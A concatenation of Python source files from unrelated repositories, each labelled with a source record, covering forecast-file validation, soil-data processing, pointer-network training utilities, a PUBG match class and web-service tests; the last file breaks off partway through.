from zoltpy.covid19 import validate_quantile_csv_file
import glob
from pprint import pprint
import sys
import os
import pandas as pd
import numpy as np
from datetime import datetime
import yaml
from itertools import chain
import collections
from validation_functions.metadata import check_for_metadata, get_metadata_model, output_duplicate_models
from validation_functions.forecast_filename import validate_forecast_file_name
from validation_functions.forecast_date import filename_match_forecast_date
def validate_forecast_file(filepath):
"""
purpose: Validates the forecast file with zoltpy
link: https://github.com/reichlab/zoltpy/blob/master/zoltpy/covid19.py
params:
* filepath: Full filepath of the forecast
"""
file_error = validate_quantile_csv_file(filepath)
if file_error != "no errors":
return True, file_error
else:
return False, file_error
def compile_output_errors(filepath, is_filename_error, filename_error_output, is_error, forecast_error_output,
is_date_error, forecast_date_output):
"""
    purpose: compile the filename, format and forecast-date errors for a single forecast file into one list
params:
* filepath: Full filepath of the forecast
* is_filename_error: Filename != file path (True/False)
* filename_error_output: Text output error filename != file path
* is_error: Forecast file has error (True/False)
* forecast_error_output: Text output forecast file error
* is_date_error: forecast_date error (True/False)
* forecast_date_output: Text output forecast_date error
"""
# Initialize output errors as list
output_error_text = []
# Iterate through params
error_bool = [is_filename_error, is_error, is_date_error]
error_text = [filename_error_output, forecast_error_output, forecast_date_output]
# Loop through all possible errors and add to final output
for i in range(len(error_bool)):
if error_bool[i]: # Error == True
output_error_text += error_text[i]
# Output errors if present as dict
# Output_error_text = list(chain.from_iterable(output_error_text))
return output_error_text
def update_checked_files(df, previous_checked, files_in_repository):
"""
purpose: update locally_validated_files.csv and remove deleted files
params:
* df: Pandas dataframe containing currently checked files
* previous_checked: Previously checked files as list
* files_in_repository: Current files in repo as list
"""
# Remove files that have been deleted from repo
# Files that are in verify checks but NOT in repository
deleted_files = np.setdiff1d(previous_checked, files_in_repository)
df = df[~df['file_path'].isin(deleted_files)]
# update previously checked files
df.to_csv('code/validation/locally_validated_files.csv', index=False)
def print_output_errors(output_errors, prefix=""):
"""
purpose: Print the final errors
params:
* output_errors: Dict with filepath as key and list of errors error as value
"""
# Output list of Errors
if len(output_errors) > 0:
for filename, errors in output_errors.items():
print("\n* ERROR IN ", filename)
for error in errors:
print(error)
print("\n✗ %s error found in %d file%s. Error details are above." % (prefix, len(output_errors) ,("s" if len(output_errors)>1 else "")))
else:
print("\n✓ no %s errors"% (prefix))
# Check forecast formatting
def check_formatting(my_path):
"""
purpose: Iterate through every forecast file and metadatadata
file and perform validation checks if haven't already.
link: https://github.com/reichlab/covid19-forecast-hub/wiki/Validation-Checks#current-validation-checks
params:
* my_path: string path to folder where forecasts are
"""
df = pd.read_csv('code/validation/validated_files.csv')
previous_checked = list(df['file_path'])
files_in_repository = []
output_errors = {}
meta_output_errors = {}
existing_metadata_name = collections.defaultdict(list)
existing_metadata_abbr = collections.defaultdict(list)
errors_exist = False # Keep track of errors
# Iterate through processed csvs
for path in glob.iglob(my_path + "**/**/", recursive=False):
# Check metadata file
is_metadata_error, metadata_error_output = check_for_metadata(path)
# Check metadata names and abbreviations for duplicates
model_name, model_abbr = get_metadata_model(path)
# Add checked model_name and model_abbr to list to keep track of duplicates
if model_name is not None:
existing_metadata_name[model_name].append(path)
if model_abbr is not None:
existing_metadata_abbr[model_abbr].append(path)
# Output metadata errors
if is_metadata_error:
meta_output_errors[path] = metadata_error_output
# Get filepath
forecast_file_path = os.path.basename(os.path.dirname(path))
# Iterate through forecast files to validate format
for filepath in glob.iglob(path + "*.csv", recursive=False):
files_in_repository += [filepath]
# Check if file has been edited since last checked
if filepath not in previous_checked:
# Validate forecast file name = forecast file path
is_filename_error, filename_error_output = validate_forecast_file_name(filepath, forecast_file_path)
# Validate forecast file formatting
is_error, forecast_error_output = validate_forecast_file(filepath)
# Validate forecast file date = forecast_date column
is_date_error, forecast_date_output = filename_match_forecast_date(filepath)
# Add to previously checked files
output_error_text = compile_output_errors(filepath,
is_filename_error, filename_error_output,
is_error, forecast_error_output,
is_date_error, forecast_date_output)
if output_error_text != []:
output_errors[filepath] = output_error_text
# Add validated file to locally_validated_files.csv
if len(output_errors) == 0:
current_time = datetime.now()
df = df.append({'file_path': filepath,
'validation_date': current_time}, ignore_index=True)
# Output duplicate model name or abbreviation metadata errors
output_errors = output_duplicate_models(existing_metadata_abbr, output_errors)
output_errors = output_duplicate_models(existing_metadata_name, output_errors)
# Update the locally_validated_files.csv
update_checked_files(df, previous_checked, files_in_repository)
# Error if necessary and print to console
print_output_errors(meta_output_errors, prefix='metadata')
print_output_errors(output_errors, prefix='data')
if len(meta_output_errors) + len(output_errors) > 0:
sys.exit("\n ERRORS FOUND EXITING BUILD...")
def main():
my_path = "./data-processed"
check_formatting(my_path)
if __name__ == "__main__":
main()
``` |
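The reporting helper `print_output_errors` simply walks a dict of `filepath -> list of error strings`, so it can be exercised on its own. The path and message below are fabricated, and the snippet assumes the functions above are in scope (the script's hyphenated filename keeps it from being imported as a regular module):
```python
# Hedged sketch: what the reporting helper prints for a fabricated error dict.
fake_errors = {
    "data-processed/TEAM-model/2020-06-01-TEAM-model.csv": [  # made-up file path
        "FORECAST DATE ERROR: forecast_date column does not match the filename date",  # made-up message
    ],
}
print_output_errors(fake_errors, prefix="data")  # prints the per-file errors plus a ✗ summary line
print_output_errors({}, prefix="metadata")       # prints the ✓ "no metadata errors" line
```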
{
"source": "jocelitocastro/cm-m",
"score": 2
} |
#### File: cm-m/bin/3_gerar_arquivos_solo.py
```python
import sys, re, os, time
import numpy as np
import base_ptfs_module as soilhydros
import submodules as sm
import configparser
########## DEFINITIONS ##########----------##########----------##########----------
# Don't change these paths
project_name = sm.project_name()
map_path = os.path.join(sm.path_project, "Database", "Maps", "Vector")
soil_path = os.path.join(sm.path_project, "Database", "Soil")
soilgrids_path = os.path.join(soil_path, "soilgrids")
saida_atributos_solo = f"pontos_com_atributos_solo_{sm.project_name()}"
##########----------##########----------##########----------##########----------
def defineSoilFileName(df):
lat = df[0]
lon = df[1]
elev = df[2]
print(f"{lat:.2f}{lon:.2f}+{elev:.1f}m.sil")
return f"{lat:.2f}{lon:.2f}+{elev:.1f}m.sil"
def createSoilFiles(soil_attributes, centroides):
"""
This function aims to create the soil files to CropSyst, using the
array created previously with soilhydros.hodnett_tomasella_2002 module
Parameters
----------
soil_attributes : using soil_attributes array
DESCRIPTION.
Inputs --> theta_s[0], theta_fc[1], theta_pwp[2], Ksm[3], rho_s[4], Sa[5],
Si[6], Cl[7], pH[8], CEC[9], OM[10]
Returns
-------
None.
"""
soilAttributesDict = {'saturation': 0, 'field_capacity': 1, 'perm_wilt_point': 2,
'sat_hydraul_cond': 3, 'bulk_density': 4, 'sand': 5,
'silt': 6, 'clay': 7, 'pH': 8, 'cation_exchange_capacity': 9,
'organic_matter': 10}
file_standard = os.path.join(sm.path_project, "Database", "Format", "standard.sil")
standardParser = configparser.ConfigParser()
standardParser.read(file_standard, encoding='latin1')
for row in range(soil_attributes.shape[1]):
# print(row)
# soilFileName = defineSoilFileName(soil_attributes[0, row, :3])
soilFileName = f"{centroides.loc[row, 'gridcel']}.sil"
for depthId, depth in enumerate(soilhydros.soil_layers):
depthCS = str(depthId+1)
for keyParam in soilAttributesDict:
valueToUpdate = soil_attributes[depthId, row, soilAttributesDict[keyParam]+3]
standardParser.set(keyParam, depthCS, str(valueToUpdate))
if not os.path.exists(soil_path):
os.makedirs(soil_path)
# save to the final soil file format *.sil
with open(os.path.join(soil_path, soilFileName), 'w') as f:
standardParser.write(f, space_around_delimiters=False)
def main():
variaveis_soil_grids = ['bdod', 'cec', 'clay', 'phh2o', 'sand', 'soc']
    # Load all soilgrids values (mean value)
shapefile_graticulate = sm.reading_soilgrids_attributes(project_name, map_path)
sm.saving_shape(shapefile_graticulate, "soil_attributes", map_path, project_name)
dataSoilAttributes = np.zeros((len(soilhydros.soil_layers), len(shapefile_graticulate),
len(variaveis_soil_grids)+3))
dataSoilAttributes[:, :, 0] = shapefile_graticulate['lat']
dataSoilAttributes[:, :, 1] = shapefile_graticulate['lon']
dataSoilAttributes[:, :, 2] = shapefile_graticulate['elevation']
for depthId in soilhydros.soil_layers_int.keys():
print(depthId)
for idx, indexVar in enumerate(variaveis_soil_grids):
# print(idx, "indexVar: ", indexVar)
variavel = f"{indexVar}_{depthId}"
dataSoilAttributes[depthId, :, idx+3] = shapefile_graticulate[variavel].values
    # Saving the per-point attributes - SoilGrids standard format
np.save(os.path.join(soilgrids_path, f"Atributos_solos_pontos_{project_name}.npy"), dataSoilAttributes)
    # Loading the saved attributes - SoilGrids standard format
# dataSoilAttributes = np.load(os.path.join(soilgrids_path, "{0}.npy".format(saida_solo)))
# Outputs --> alpha, n, theta_s, theta_r, theta_fc, theta_pwp, KsOttoni, Ks --> 8 columns
HodnettvG = np.zeros((len(soilhydros.soil_layers), len(dataSoilAttributes[0]), 14))
parametrosAjustados = np.zeros((len(soilhydros.soil_layers), len(dataSoilAttributes[0]), 9))
# ========================================================================
for depthId in soilhydros.soil_layers_int.keys():
# Positions for dataSoilAttributes: rho_s[3], CEC[4], Cl[5], pH[6], Sa[7], OC[8]
# Calculates the van Genuchten parameters, water contents based on Hodnett & Tomasella (2002)
# and Ks based on Ottoni et. al (2019)
HodnettvG[depthId, :, :3] = dataSoilAttributes[depthId, :, :3]
parametrosAjustados[depthId, :, :2] = dataSoilAttributes[depthId, :, :2]
# HodnettvG:
# Outputs --> lat[0], lon[1], elev[2], theta_s[3], theta_fc[4], theta_pwp[5],
# Ksm[6], rho_s[7], Sa[8], Si[9], Cl[10], pH[11], CEC[12], OM[13]
# ParametrosAjustados:
# Outputs --> alpha[2], n[3], theta_s[4], theta_330[5], theta_pwp[6], theta_r[7], Ks[8]
HodnettvG[depthId, :, 3:], parametrosAjustados[depthId, :, 2:] = soilhydros.hodnett_tomasella_2002(dataSoilAttributes[depthId, :, :])
    # Saving the fitted parameters per point at all depths
np.save(os.path.join(soilgrids_path, f"pontos_com_atributos_solo_Hodnett_{project_name}.npy"), HodnettvG)
np.save(os.path.join(soilgrids_path, f"parametros_solos_ajustados_{project_name}.npy"), parametrosAjustados)
    # Saving all points at depth 0
#vGAdjustedParams = np.asarray([alpha, n, theta_s, theta_330, theta_pwp, theta_r, Ksm])
# HodnettvG = np.load(os.path.join(soilgrids_path, "{0}.npy".format(saida_atributos_solo)))
# parametrosAjustados = np.load(os.path.join(soilgrids_path, "parametros_ajustados_{0}.npy".format(saida_atributos_solo)))
createSoilFiles(HodnettvG, shapefile_graticulate)
if __name__ == '__main__':
if len(sys.argv) != 1:
print("[ ERROR ] This program needs no arguments")
sys.exit(1)
main()
```
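The `pontos_com_atributos_solo_Hodnett_*.npy` array written by `main()` is indexed as `[depth layer, point, column]`, with columns 0-2 holding lat/lon/elevation and columns 3-13 the derived properties in the order listed in `createSoilFiles` (theta_s, theta_fc, theta_pwp, Ks, rho_s, Sa, Si, Cl, pH, CEC, OM). A small sketch for inspecting it after the script has run; the path and project name are placeholders:
```python
# Hedged sketch: reading back the per-point soil attributes saved by main().
import os
import numpy as np
soilgrids_path = os.path.join("Database", "Soil", "soilgrids")  # placeholder: adjust to your project layout
project_name = "my_project"                                     # placeholder: sm.project_name() in the pipeline
hodnett = np.load(os.path.join(soilgrids_path, f"pontos_com_atributos_solo_Hodnett_{project_name}.npy"))
# Column layout: 0 lat, 1 lon, 2 elev, 3 theta_s, 4 theta_fc, 5 theta_pwp, 6 Ks, 7 rho_s, ...
depth_layer, point = 0, 0
print("lat/lon:", hodnett[depth_layer, point, 0], hodnett[depth_layer, point, 1])
print("theta_s:", hodnett[depth_layer, point, 3])
print("field capacity / wilting point:", hodnett[depth_layer, point, 4], hodnett[depth_layer, point, 5])
```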
#### File: cm-m/bin/submodules.py
```python
import os, re, glob
import geopandas as gpd
import pandas as pd
from rasterstats import zonal_stats
import platform
import pyproj
import yaml # to open and save crop information
#### PARAMETERS ####
# Defining the projection to the project
EPSG = 4326 # WGS84
# Defining CRS to extract soilgrids maps
crs = "http://www.opengis.net/def/crs/EPSG/0/152160"
# Defining Homolosine projection
crs_homolosine = pyproj.CRS("""PROJCS["Homolosine",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]],
PROJECTION["Interrupted_Goode_Homolosine"],
UNIT["Meter",1]]""")
# Resolução final das imagens do soilgrids (em graus)
soilgrids_res = 0.0024699875253998624
#### END OF PARAMETERS ####
path_project = os.path.dirname(os.getcwd())
def project_name():
if platform.system() != 'Linux':
return path_project.split('\\')[-1]
else:
return path_project.split('/')[-1]
def main_zonal_stats(grid, rasterfile, variavel, arredondamento):
stats = zonal_stats(grid, rasterfile, all_touched=True, stats="mean")
df = gpd.GeoDataFrame.from_dict(stats).round(arredondamento)
df.rename(columns={'mean': variavel}, inplace=True)
pointInPolys = pd.merge(grid, df, how='left', left_index=True, right_index=True)
return pointInPolys
def saving_shape(geodf, tipo, output_path, filename):
    # Function to save the file in shapefile format
geodf.to_file(os.path.join(output_path, "{0}_{1}.shp".format(filename, tipo)))
def extract_graticulate_bounds(shapefile):
bounds = gpd.read_file(shapefile).to_crs(crs_homolosine).bounds
# Lower left corner
idx_minimum = bounds.minx.idxmin()
# bounds.minx.loc[idx_minimum]
# bounds.miny.loc[idx_minimum]
# Upper right corner
idx_maximum = bounds.maxx.idxmax()
# bounds.maxx.loc[idx_maximum]
# bounds.maxy.loc[idx_maximum]
return [('X', int(bounds.minx.loc[idx_minimum]), int(bounds.maxx.loc[idx_maximum])),
('Y', int(bounds.miny.loc[idx_minimum]), int(bounds.maxy.loc[idx_maximum]))]
def zonal_soilgrids(project_name, map_path, rasterfile):
# print("Opening polygons shapefile")
return zonal_stats(os.path.join(map_path, f"{project_name}_graticulate.shp"),
rasterfile, all_touched=True, stats="mean")
def reading_soilgrids_attributes(project_name, map_path):
files = glob.glob(os.path.join(path_project, 'Database', 'Soil', 'soilgrids', '*tif'))
polygons = gpd.GeoDataFrame(
gpd.read_file(os.path.join(map_path, f"{project_name}_graticulate.shp"), geometry='geometry'))
    # Creating the regular expression pattern
patternVarName = re.compile(r"4326_([A-Za-z0-9]*)_([0-9-a-z_]*)cm")
conversao_soil_grids = {'bdod': 0.01, 'phh2o': 0.1, 'cec': 0.1,
'sand': 0.1, 'soc': 0.01, 'clay': 0.1}
depths = {"0-5": 0, "5-15": 1, "15-30": 2, "30-60": 3, "60-100": 4, "100-200": 5}
for n, file in enumerate(files):
# print(n, file)
reMatchVar = re.search(patternVarName, file)
select_depth = reMatchVar.group(2).split("cm")[0]
# print(select_depth)
variavel = reMatchVar.group(1)
# print(variavel)
var_header = f"{variavel}_{depths[select_depth]}"
print(f"Extracting: {variavel}_{select_depth}cm")
polygons[var_header] = 0.
stats_return = zonal_soilgrids(project_name, map_path, file)
for i, value in enumerate(stats_return):
converted_value = value['mean'] * conversao_soil_grids[variavel]
# print(i, converted_value)
# print(value['mean'], variavel, conversao_soil_grids[variavel], value['mean'] * conversao_soil_grids[variavel])
polygons.loc[i, var_header] = converted_value
return polygons
def openYamlFile(file_name):
with open(file_name, 'r') as f:
output_vars = yaml.safe_load(f)
return output_vars
``` |
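`main_zonal_stats` is a thin wrapper around `rasterstats.zonal_stats`: it computes the mean raster value inside each polygon, renames the `mean` column to the requested variable name and merges the result back onto the grid. A minimal usage sketch; the shapefile and raster paths are placeholders:
```python
# Hedged sketch: attaching a mean raster value to every grid cell.
import geopandas as gpd
from submodules import main_zonal_stats  # assumes this file is importable as 'submodules'
grid = gpd.read_file("my_project_graticulate.shp")        # placeholder vector grid
grid_with_elev = main_zonal_stats(grid, "elevation.tif",  # placeholder raster
                                  variavel="elevation", arredondamento=1)
print(grid_with_elev["elevation"].head())
```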
{
"source": "JocelynBe/blog-post-pointer-networks",
"score": 2
} |
#### File: blog-post-pointer-networks/pointer-network/utils.py
```python
import os
import random
import string
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple
import numpy as np
import pandas as pd
import pytesseract
import shapely.geometry
import torch
from PIL import Image, ImageDraw
from sklearn.metrics import auc, precision_recall_curve
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader
from tqdm import tqdm
from model import Model
def OCR(image_path: str) -> List[Dict[str, Any]]:
image = Image.open(image_path)
image_data = pytesseract.image_to_data(image, output_type='data.frame')
image_data = image_data.loc[
image_data.text.apply(lambda x: pd.notnull(x) and x != '')
]
image_data['position'] = image_data.apply(
lambda row: [
int(row['left']),
int(row['top']),
int(row['left']) + int(row['width']),
int(row['top']) + int(row['height']),
],
axis=1,
)
    return image_data[['text', 'position']].to_dict(orient='records')
def display_doc(doc: Dict[str, Any], predicted_tokens: Optional[List[int]] = None):
image = Image.open(doc['image_path'])
draw = ImageDraw.Draw(image)
if predicted_tokens is None:
subset_of_tokens = range(0, len(doc['OCR']))
else:
# -1 to account for the stop token
subset_of_tokens = [idx - 1 for idx in predicted_tokens if idx != 0]
for i in subset_of_tokens:
token = doc['OCR'][i]
draw.rectangle(token['position'], outline='blue')
draw.rectangle(doc['ground_truth'], outline='red', width=3)
return image
def ground_truth_match(
ocr_doc: List[Dict[str, Any]], ground_truth: List[float], threshold: float = 0.5
) -> List[int]:
ground_truth = shapely.geometry.box(*ground_truth)
labels = []
for (i, token) in enumerate(ocr_doc):
box = shapely.geometry.box(*token['position'])
match_score = ground_truth.intersection(box).area / box.area
if match_score > threshold:
labels.append(i + 1) # 0 is reserved for the padding / stop token
return labels
def seed_worker(worker_id):
worker_seed = torch.initial_seed() % 2 ** 32
np.random.seed(worker_seed)
random.seed(worker_seed)
def get_loaders(datasets, batch_size):
train_loader = DataLoader(
datasets['train'], batch_size=batch_size, worker_init_fn=seed_worker
)
val_loader = DataLoader(
datasets['validation'], batch_size=batch_size, worker_init_fn=seed_worker
)
test_loader = DataLoader(
datasets['test'], batch_size=batch_size, worker_init_fn=seed_worker
)
return train_loader, val_loader, test_loader
def text_pre_processing(text: str) -> str:
text = text.strip().lower()
text = ''.join([c for c in text if c in string.ascii_lowercase + string.digits])
return text
def pad_tensor(
tensor: torch.tensor, max_shape_0: int, max_shape_1: int
) -> torch.tensor:
new_tensor = torch.zeros(max_shape_0, max_shape_1)
a, b = tensor.shape
new_tensor[:a, :b] = tensor
return new_tensor
@dataclass
class Tensors:
keys: torch.tensor
words: torch.tensor
positions: torch.tensor
target: torch.tensor
def make_tensors(
dataset: List[Tuple[str, List[Tuple[List[int], List[float]]], List[int]]]
) -> Tensors:
list_keys, list_words, list_positions, list_targets = [], [], [], []
for key, input_data, target in dataset:
words = pad_sequence(
[torch.tensor(chars) for chars, position in input_data], batch_first=True
)
positions = torch.tensor([position for chars, position in input_data])
list_keys.append(int(key))
list_words.append(words)
list_positions.append(positions)
list_targets.append(torch.tensor(target + [0]))
shapes = [words.shape for words in list_words]
max_shape_0 = (
max([shape[0] for shape in shapes]) + 1
) # Adding a row so that the last row is
# always zero for consistency
max_shape_1 = max([shape[1] for shape in shapes]) + 1 # idem
tensor_words = torch.cat(
[
pad_tensor(words, max_shape_0, max_shape_1).unsqueeze(0)
for words in list_words
]
)
tensor_positions = torch.cat(
[
pad_tensor(positions, max_shape_0, 4).unsqueeze(0)
for positions in list_positions
]
)
tensor_target = pad_sequence(list_targets, batch_first=True)
return Tensors(
keys=torch.tensor(list_keys),
words=tensor_words,
positions=tensor_positions,
target=tensor_target,
)
def loss_function(
overall_probabilities: torch.tensor, target: torch.tensor
) -> torch.tensor:
batch_size, max_seq_len, n_tokens = overall_probabilities.shape
flat_target = target.reshape(-1)
flat_probabilities = overall_probabilities.reshape(-1, n_tokens)
loss = torch.nn.functional.cross_entropy(
flat_probabilities, flat_target, reduction='mean'
)
return loss
def get_val_loss(
model: Model, optimizer: torch.optim.Optimizer, val_loader: DataLoader
) -> float:
epoch_losses = []
for _, words, positions, target in val_loader:
overall_probabilities, peak_indices = model.forward(words, positions)
loss = loss_function(overall_probabilities, target)
optimizer.zero_grad()
epoch_losses.append(loss.item())
val_loss = np.mean(epoch_losses)
return val_loss
def train_model(
n_epochs: int,
model: Model,
optimizer: torch.optim.Optimizer,
train_loader: DataLoader,
val_loader: DataLoader,
) -> Tuple[List[float], List[float], List[float]]:
if not os.path.exists('models'):
os.mkdir('models')
train_losses, val_losses, validation_metrics = [], [], []
for epoch in range(n_epochs):
# Train
model.train()
epoch_losses = []
for _, words, positions, target in tqdm(train_loader):
overall_probabilities, peak_indices = model.forward(words, positions)
loss = loss_function(overall_probabilities, target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
epoch_losses.append(loss.item())
train_loss = np.mean(epoch_losses)
train_losses.append(train_loss)
# Validation
model.eval()
val_loss = get_val_loss(model, optimizer, val_loader)
val_losses.append(val_loss)
val_threshold_data = get_threshold_data(model, optimizer, val_loader)
val_metrics = get_metrics(val_threshold_data)
validation_metrics.append(val_metrics)
print(
f'Epoch {epoch}, train_loss={train_loss}, val_loss={val_loss} \n val_metrics={val_metrics}'
)
torch.save(model, f'models/model_{epoch}.torch')
return train_losses, val_losses, validation_metrics
def get_threshold_data(
model: Model, optimizer: torch.optim.Optimizer, loader: DataLoader
) -> pd.DataFrame:
model.eval()
confidence_and_is_correct = []
for _, words, positions, target in loader:
overall_probabilities, peak_indices = model.forward(words, positions)
optimizer.zero_grad()
predicted_tokens = torch.argmax(overall_probabilities, 2)
prediction_confidence = (
overall_probabilities.exp().max(axis=2).values.min(axis=1).values.tolist()
)
prediction = np.array(
[
set(
single_prediction
) # We don't care about the ordering or repetitions
for single_prediction in predicted_tokens.tolist()
]
)
target = np.array(list(map(set, target.tolist())))
prediction_correct = prediction == target
confidence_and_is_correct += list(
zip(prediction_confidence, prediction_correct)
)
threshold_data = pd.DataFrame(confidence_and_is_correct)
threshold_data.columns = ['confidence', 'is_correct']
return threshold_data
def get_metrics(threshold_data: pd.DataFrame) -> Dict[str, float]:
accuracy = len(threshold_data.loc[threshold_data.is_correct]) / len(threshold_data)
precision, recall, thresholds = precision_recall_curve(
1 * threshold_data.is_correct.values, threshold_data.confidence.values
)
precision_recall_auc = auc(recall, precision)
return {'accuracy': accuracy, 'PR-AUC': precision_recall_auc}
def find_threshold(
target_accuracy: float, val_threshold_data: pd.DataFrame
) -> Tuple[List[float], List[float], float]:
thresholds = np.linspace(val_threshold_data.confidence.min(), 1, 100)
accuracies, automations = [], []
for th in thresholds:
tmp = val_threshold_data.loc[val_threshold_data.confidence >= th]
accuracy = tmp.is_correct.mean()
automation = len(tmp) / len(val_threshold_data)
accuracies.append(accuracy)
automations.append(automation)
threshold_99acc = min(
[th for th, acc in zip(thresholds, accuracies) if acc >= target_accuracy]
)
return accuracies, automations, threshold_99acc
def display_prediction(doc: Dict[str, Any], peaks: List[int]) -> Image.Image:
return display_doc(doc, predicted_tokens=peaks)
def set_seed(seed: int) -> None: # To ensure reproducibility
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(seed)
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.set_deterministic(True)
torch.set_num_threads(1)
``` |
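The matching rule in `ground_truth_match` is purely geometric: a token is labelled positive when more than `threshold` of its own box area falls inside the ground-truth box. A small self-contained check of that rule; the boxes below are made-up coordinates:
```python
# Hedged sketch: the overlap rule used by ground_truth_match, on toy boxes.
import shapely.geometry
ground_truth = shapely.geometry.box(0, 0, 100, 20)     # made-up ground-truth field box
token_inside = shapely.geometry.box(10, 2, 40, 18)     # token fully inside the field
token_outside = shapely.geometry.box(150, 0, 180, 20)  # token elsewhere on the page
for box in (token_inside, token_outside):
    match_score = ground_truth.intersection(box).area / box.area
    print(round(match_score, 2), match_score > 0.5)
# -> 1.0 True, then 0.0 False
```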
{
"source": "jocelynchen66/PUBG-Madglory-Project",
"score": 3
} |
#### File: pubg/test1/match_object.py
```python
import datetime
"""
Match objects contain information about a completed match such as the game mode
played, duration, and which players participated.
"""
class match_obj:
def __init__(self, data):
"""
data is the response from pubg api after sending get request using match object url
"""
self.id = data['data']['id']
self.createdAt = datetime.datetime.strptime(data['data']['attributes']['createdAt'], "%Y-%m-%dT%H:%M:%SZ")
self.duration = data['data']['attributes']['duration']
self.gameMode = data['data']['attributes']['gameMode']
self.mapName = data['data']['attributes']['mapName']
self.isCustomMatch = data['data']['attributes']['isCustomMatch']
self.seasonState = data['data']['attributes']['seasonState']
self.shardId = data['data']['attributes']['shardId']
self.asset_id = data['data']['relationships']['assets']['data'][0]['id']
self.included = data['included']
self.telemetry_url = ''
``` |
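`match_obj` only reads a handful of paths out of the PUBG API response, so a minimal dict with those keys is enough to construct one. The values below are placeholders, not real API output:
```python
# Hedged sketch: the minimal response shape match_obj expects.
from match_object import match_obj  # assumes the module above is on the path
fake_response = {
    "data": {
        "id": "match-0000",  # placeholder id
        "attributes": {
            "createdAt": "2020-01-01T12:00:00Z",
            "duration": 1800,
            "gameMode": "squad-fpp",
            "mapName": "Baltic_Main",
            "isCustomMatch": False,
            "seasonState": "progress",
            "shardId": "steam",
        },
        "relationships": {"assets": {"data": [{"id": "asset-0000"}]}},
    },
    "included": [],
}
sample_match = match_obj(fake_response)
print(sample_match.createdAt, sample_match.gameMode, sample_match.asset_id)
```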
{
"source": "jocelyn/codeboard_mantra",
"score": 3
} |
#### File: Root/test/test1.py
```python
from Root import b
import unittest
class test1(unittest.TestCase):
def test_shuffle(self):
self.assertEqual(b.add(1,2),3)
def test_add(self):
self.assertEqual(b.add(4,2),6)
def test_addFail(self):
self.assertEqual(b.add(1,2),4)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JocelynDelalande/dockerspawner",
"score": 2
} |
#### File: dockerspawner/tests/test_systemuserspawner.py
```python
from getpass import getuser
from unittest import mock
import pytest
from jupyterhub.tests.test_api import add_user, api_request
from jupyterhub.tests.mocking import public_url
from jupyterhub.tests.utils import async_requests
from jupyterhub.utils import url_path_join
from dockerspawner import SystemUserSpawner
pytestmark = pytest.mark.usefixtures("systemuserspawner")
@pytest.fixture
def systemuserspawner(app):
"""Configure JupyterHub to use DockerSpawner"""
app.config.SwarmSpawner.prefix = "dockerspawner-test"
with mock.patch.dict(
app.tornado_settings, {"spawner_class": SystemUserSpawner}
):
yield
@pytest.mark.gen_test
def test_start_stop(app):
name = getuser()
add_user(app.db, app, name=name)
user = app.users[name]
assert isinstance(user.spawner, SystemUserSpawner)
token = user.new_api_token()
# start the server
r = yield api_request(app, "users", name, "server", method="post")
while r.status_code == 202:
# request again
r = yield api_request(app, "users", name, "server", method="post")
assert r.status_code == 201, r.text
url = url_path_join(public_url(app, user), "api/status")
r = yield async_requests.get(url, headers={"Authorization": "token %s" % token})
assert r.url == url
r.raise_for_status()
print(r.text)
assert "kernels" in r.json()
``` |
{
"source": "JocelynDelalande/isso",
"score": 2
} |
#### File: isso/specs/test_comments.py
```python
from __future__ import unicode_literals
import os
import json
import tempfile
import unittest
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
from werkzeug.wrappers import Response
from isso import Isso, core
from isso.utils import http
from isso.views import comments
from fixtures import curl, loads, FakeIP, JSONClient
http.curl = curl
class TestComments(unittest.TestCase):
def setUp(self):
fd, self.path = tempfile.mkstemp()
conf = core.Config.load(None)
conf.set("general", "dbpath", self.path)
conf.set("guard", "enabled", "off")
class App(Isso, core.Mixin):
pass
self.app = App(conf)
self.app.wsgi_app = FakeIP(self.app.wsgi_app, "192.168.1.1")
self.client = JSONClient(self.app, Response)
self.get = self.client.get
self.put = self.client.put
self.post = self.client.post
self.delete = self.client.delete
def tearDown(self):
os.unlink(self.path)
def testGet(self):
self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Lorem ipsum ...'}))
r = self.get('/id/1')
assert r.status_code == 200
rv = loads(r.data)
assert rv['id'] == 1
assert rv['text'] == '<p>Lorem ipsum ...</p>'
def testCreate(self):
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Lorem ipsum ...'}))
assert rv.status_code == 201
assert any(filter(lambda header: header[0] == 'Set-Cookie', rv.headers))
rv = loads(rv.data)
assert rv["mode"] == 1
assert rv["text"] == '<p>Lorem ipsum ...</p>'
    def testCreateWithNonAsciiText(self):
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Здравствуй, мир!'}))
assert rv.status_code == 201
assert any(filter(lambda header: header[0] == 'Set-Cookie', rv.headers))
rv = loads(rv.data)
assert rv["mode"] == 1
assert rv["text"] == '<p>Здравствуй, мир!</p>'
def testCreateMultiple(self):
a = self.post('/new?uri=test', data=json.dumps({'text': '...'}))
b = self.post('/new?uri=test', data=json.dumps({'text': '...'}))
c = self.post('/new?uri=test', data=json.dumps({'text': '...'}))
assert loads(a.data)["id"] == 1
assert loads(b.data)["id"] == 2
assert loads(c.data)["id"] == 3
def testCreateAndGetMultiple(self):
for i in range(20):
self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Spam'}))
r = self.get('/?uri=%2Fpath%2F')
assert r.status_code == 200
rv = loads(r.data)
assert len(rv) == 20
def testCreateBlank(self):
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': ''}))
assert rv.status_code == 400
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': "\n\n\n"}))
assert rv.status_code == 400
def testGetInvalid(self):
assert self.get('/?uri=%2Fpath%2F&id=123').status_code == 404
assert self.get('/?uri=%2Fpath%2Fspam%2F&id=123').status_code == 404
assert self.get('/?uri=?uri=%foo%2F').status_code == 404
def testUpdate(self):
